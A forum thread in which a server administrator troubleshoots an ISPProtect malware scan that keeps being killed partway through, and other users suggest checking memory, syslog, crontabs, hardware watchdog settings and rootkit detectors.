Scan the website for malware, e.g. with ISPProtect: https://ispprotect.com/ the first scan is free, no registration required.
I bought the script because I have already used at thw past but stopped before ending... Code: Please enter path to scan: /var Starting scan. This can take a long, long time depending on the server hardware and the amount of files ... !!! DO NOT INTERRUPT THE SCRIPT !!!! After the scan is completed, you will find the results also in the following fil es: Malware => /tmp/found_malware_202405141030th.txt Wordpress => /tmp/software_wordpress_202405141030th.txt Joomla => /tmp/software_joomla_202405141030th.txt Drupal => /tmp/software_drupal_202405141030th.txt Mediawiki => /tmp/software_mediawiki_202405141030th.txt Contao => /tmp/software_contao_202405141030th.txt Magentocommerce => /tmp/software_magentocommerce_202405141030th.txt Woltlab Burning Board => /tmp/software_woltlab_burning_board_202405141030th.tx t Cms Made Simple => /tmp/software_cms_made_simple_202405141030th.txt Phpmyadmin => /tmp/software_phpmyadmin_202405141030th.txt Typo3 => /tmp/software_typo3_202405141030th.txt Roundcube => /tmp/software_roundcube_202405141030th.txt Shopware => /tmp/software_shopware_202405141030th.txt Mysqldumper => /tmp/software_mysqldumper_202405141030th.txt Prestashop => /tmp/software_prestashop_202405141030th.txt File system scan completed, found 326645 files to consider. Starting scan level 1 ... Scanning 326645 files now ... Scan level 1 completed. 0 hits. Starting scan level 1.1 ... Scanning 112606 files now ... Scan level 1.1 completed. 0 hits. Read 61734 whitelist signatures ... Starting scan level 2 ... Scanning 81042 files now ... Scan level 2: 5,876/81,042 (7%) completed. 1 hits. [ETA 01:16:32] ./ispp_scan: line 220: 9423 Killed $PHP -n -c ${DIR}/ispp_php.ini -q ${DIR}/ispp_scan.php "$@" root@srv:/tmp#
Strange that script exits before scanning everything. Did you use the old script from previous scans or did you download the latest version? Script says it found 1 hit, did you read all the *.txt files in /tmp/ to see if there is info on what it found?
I execute again Code: cd /tmp wget https://www.ispprotect.com/download/ispp_scan.tar.gz tar xzf ispp_scan.tar.gz ./ispp_scan I have read all txt files nothing included
I assume this means that the process or a subprocess got killed. Check the syslog of the system if the process may got oom killed
Try scanning only the web7 website, that should finish sooner. Check cron files, malware tends to put in cron script that installs malware back if it gets removed. Code: ls -l /var/spool/cron/crontabs/ To find Out Of Memory messages like @pyte suggested, try Code: grep -i oom /var/log/syslog
no out of memory messages.... Better but not enought Code: Please enter path to scan: /var/www/clients/client0/web7/ Starting scan. This can take a long, long time depending on the server hardware and the amount of files ... !!! DO NOT INTERRUPT THE SCRIPT !!!! After the scan is completed, you will find the results also in the following fil es: Malware => /tmp/found_malware_202405141753th.txt Wordpress => /tmp/software_wordpress_202405141753th.txt Joomla => /tmp/software_joomla_202405141753th.txt Drupal => /tmp/software_drupal_202405141753th.txt Mediawiki => /tmp/software_mediawiki_202405141753th.txt Contao => /tmp/software_contao_202405141753th.txt Magentocommerce => /tmp/software_magentocommerce_202405141753th.txt Woltlab Burning Board => /tmp/software_woltlab_burning_board_202405141753th.tx t Cms Made Simple => /tmp/software_cms_made_simple_202405141753th.txt Phpmyadmin => /tmp/software_phpmyadmin_202405141753th.txt Typo3 => /tmp/software_typo3_202405141753th.txt Roundcube => /tmp/software_roundcube_202405141753th.txt Shopware => /tmp/software_shopware_202405141753th.txt Mysqldumper => /tmp/software_mysqldumper_202405141753th.txt Prestashop => /tmp/software_prestashop_202405141753th.txt File system scan completed, found 276974 files to consider. Starting scan level 1 ... Scanning 276974 files now ... Scan level 1 completed. 0 hits. Starting scan level 1.1 ... Scanning 111565 files now ... Message from syslogd@srv at May 14 20:59:45 ... kernel:[172902.520597] Uhhuh. NMI received for unknown reason 30 on CPU 0. Message from syslogd@srv at May 14 20:59:45 ... kernel:[172902.520601] Do you have a strange power saving mode enabled? Message from syslogd@srv at May 14 20:59:45 ... kernel:[172902.520602] Dazed and confused, but trying to continue Scan level 1.1 completed. 0 hits. Read 61734 whitelist signatures ... Starting scan level 2 ... Scanning 78107 files now ... Scan level 2: 72,381/78,107 (93%) completed. 1 hits. [ETA 00:01:54] . /ispp_scan: line 220: 6996 Killed $PHP -n -c ${DIR}/ispp_php.i ni -q ${DIR}/ispp_scan.php "$@" root@srv:/tmp# Check cron files, malware tends to put in cron script that installs malware back if it gets removed. Code: ls -l /var/spool/cron/crontabs/ nothing suspicious on it Code: root@srv:/tmp# ls -l /var/spool/cron/crontabs/ total 16 -rw------- 1 web7 crontab 201 Oct 5 2021 defaultdiavgiagr -rw------- 1 diavgia crontab 253 Mar 29 14:48 diavgia -rw------- 1 getmail crontab 299 Mar 28 10:53 getmail -rw------- 1 web7 crontab 847 May 14 10:36 web7 root@srv:/tmp#
This is strange. The nmi watchdog seems to have some issues, either disable it or set the c-states in the BIOS to another setting(if it is a hardware server). However this issue will only occure when the system is under quiet some load. Are you sure that you don't run out of memory while the scan is running? May check the system ressources with something like htop while the scan is running. You are using proxmox might check out this: https://forum.proxmox.com/threads/uhhuh-nmi-received-for-unknown-reason-on-amd-epyc.48866/
yes I am sure. I ran the script a third time while watching the top and the memory remained low. I have spent a lot of time unfortunately without any result My knowledge is limited and maybe it's my fault that I can't describe it properly or solve it easily Code: !!! DO NOT INTERRUPT THE SCRIPT !!!! After the scan is completed, you will find the results also in the following fil es: Malware => /tmp/found_malware_202405150900th.txt Wordpress => /tmp/software_wordpress_202405150900th.txt Joomla => /tmp/software_joomla_202405150900th.txt Drupal => /tmp/software_drupal_202405150900th.txt Mediawiki => /tmp/software_mediawiki_202405150900th.txt Contao => /tmp/software_contao_202405150900th.txt Magentocommerce => /tmp/software_magentocommerce_202405150900th.txt Woltlab Burning Board => /tmp/software_woltlab_burning_board_202405150900th.tx t Cms Made Simple => /tmp/software_cms_made_simple_202405150900th.txt Phpmyadmin => /tmp/software_phpmyadmin_202405150900th.txt Typo3 => /tmp/software_typo3_202405150900th.txt Roundcube => /tmp/software_roundcube_202405150900th.txt Shopware => /tmp/software_shopware_202405150900th.txt Mysqldumper => /tmp/software_mysqldumper_202405150900th.txt Prestashop => /tmp/software_prestashop_202405150900th.txt File system scan completed, found 294565 files to consider. Starting scan level 1 ... Scanning 294565 files now ... Scan level 1 completed. 0 hits. Starting scan level 1.1 ... Scanning 111565 files now ... Scan level 1.1 completed. 0 hits. Read 61734 whitelist signatures ... Starting scan level 2 ... Scanning 78450 files now ... Scan level 2: 10,371/78,450 (13%) completed. 1 hits. [ETA 01:04:59] . /ispp_scan: line 220: 2138 Killed $PHP -n -c ${DIR}/ispp_php.i ni -q ${DIR}/ispp_scan.php "$@" root@srv:/tmp#
Well i don't know the tool but the output give some hints: I would assume that whatever is happning on line 220 in ispp_scan is causing a process to be killed. And if i understand the output correctly than it kills the "ispp_scan.php". But like i said, i'm not familiar with the script - so no clue what is causing this.
It might be time to hire help. ISPConfig Business support for example, https://www.ispconfig.org/support/ Or what is running on website web7? If it is Wordpress, there are services that remove malware from Wordpress site. Try to find a local or nearby malware removal service.
Yes, something is externally killing the scan process. This can either be caused a resource shortage like running out of RAM, as mentioned already, or maybe the system is infected by a rootkit, which kills the malware scan.
Common tools for rootkit detection are: chkrootkit rkhunter lynis https://www.howtoforge.com/performing-linux-system-audit-with-lynis/
